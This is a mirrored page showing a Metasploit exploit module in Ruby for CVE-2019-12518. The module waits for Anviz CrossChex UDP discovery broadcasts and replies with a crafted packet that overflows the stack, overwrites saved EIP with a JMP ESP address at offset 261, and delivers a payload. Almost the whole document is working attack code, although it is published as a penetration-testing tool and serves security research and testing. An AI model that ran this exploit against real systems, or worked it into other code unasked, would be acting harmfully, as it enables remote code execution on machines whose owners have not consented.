CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/crosschex_device_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8
  PACKET_LEN = 10

9


10
  include Msf::Exploit::Remote::Udp

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Anviz CrossChex Buffer Overflow',

17
        'Description' => %q{

18
          Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,

19
          triggering a stack buffer overflow.

20
        },

21
        'Author' =>

22
          [

23
            'Luis Catarino <[email protected]>', # original discovery/exploit

24
            'Pedro Rodrigues <[email protected]>', # original discovery/exploit

25
            'agalway-r7', # Module creation

26
            'adfoster-r7' # Module creation

27
          ],

28
        'License' => MSF_LICENSE,

29
        'References' =>

30
          [

31
            ['CVE', '2019-12518'],

32
            ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],

33
            ['EDB', '47734']

34
          ],

35
        'Payload' =>

36
          {

37
            'Space' => 8947,

38
            'DisableNops' => true

39
          },

40
        'Arch' => ARCH_X86,

41
        'EncoderType' => Msf::Encoder::Type::Raw,

42
        'Privileged' => true,

43
        'Platform' => 'win',

44
        'DisclosureDate' => '2019-11-28',

45
        'Targets' =>

46
            [

47
              [

48
                'Crosschex Standard x86 <= V4.3.12',

49
                {

50
                  'Offset' => 261, # Overwrites stack memory to allow saved EIP to be overwritten

51
                  'Ret' => "\x07\x18\x42\x00", # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code

52
                  'Shift' => 4 # Positions payload to be written at beginning of ESP

53
                }

54
              ]

55
            ],

56
        'DefaultTarget' => 0

57
      )

58
    )

59
    deregister_udp_options

60
    register_options(

61
      [

62
        Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),

63
        Opt::CHOST('0.0.0.0', true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),

64
        OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])

65
      ]

66
    )

67
  end

68


69
  def exploit

70
    connect_udp

71


72
    res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore['TIMEOUT'].to_i > 0 ? datastore['TIMEOUT'].to_i : nil)

73
    if res.empty?

74
      fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')

75
    end

76


77
    print_status 'CrossChex broadcast received, sending payload in response'

78
    sploit = rand_text_english(target['Offset'])

79
    sploit << target.ret # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code

80
    sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP

81
    sploit << payload.encoded

82


83
    udp_sock.sendto(sploit, host, port)

84
    print_status 'Payload sent'

85
  end

86
end

87


88